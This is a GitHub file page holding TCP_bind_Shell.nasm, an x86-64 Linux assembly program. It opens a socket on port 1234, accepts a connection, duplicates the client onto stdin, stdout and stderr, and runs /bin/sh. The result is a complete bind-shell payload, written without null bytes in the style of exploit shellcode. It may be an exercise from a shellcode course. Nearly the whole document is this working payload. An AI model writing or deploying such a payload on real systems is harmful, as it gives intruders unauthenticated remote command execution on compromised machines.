-
Notifications
You must be signed in to change notification settings - Fork 0
/
TCP_bind_Shell.nasm
86 lines (68 loc) · 1.13 KB
/
TCP_bind_Shell.nasm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
global _start
section .text
_start:
;Socket syscall
xor rax, rax
add rax, 41
xor rdi, rdi
add rdi, 2 ;stands for IPv4
xor rsi, rsi
inc rsi ;1 stands for TCP
xor rdx, rdx
syscall
;Save the sockfd in RDI register
mov rdi, rax
;Creating the structure
xor rax, rax
push rax
push word 0xd204 ;port 1234
push word 0x02 ; AF_INET
;Bind syscall
mov rsi, rsp
xor rdx, rdx
add rdx, 16
xor rax, rax
add rax, 49
syscall
;Listen syscall
xor rax, rax
add rax, 50 ;Listen
xor rsi, rsi
inc rsi
syscall
;Accept syscall
xor rax, rax
add rax, 43 ;Accept
xor rsi, rsi
xor rdx, rdx
syscall
;Store clientfd in RBX register
mov rbx, rax
;Dup2 syscall to stdin
mov rdi, rbx
xor rax, rax
add rax, 33 ;Dup2
xor rsi, rsi ; rsi = 0 stdin
syscall
;Dup2 syscall to stdout
xor rax, rax
add rax, 33
inc rsi ;rsi = 1 stdout
syscall
;Dup2 syscall stderr
xor rax, rax
add rax, 33
inc rsi ;rsi = 2 stderr
syscall
;Execve syscall with /bin/sh
xor rax, rax
push rax
mov rdx, rsp
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
add rax, 59
syscall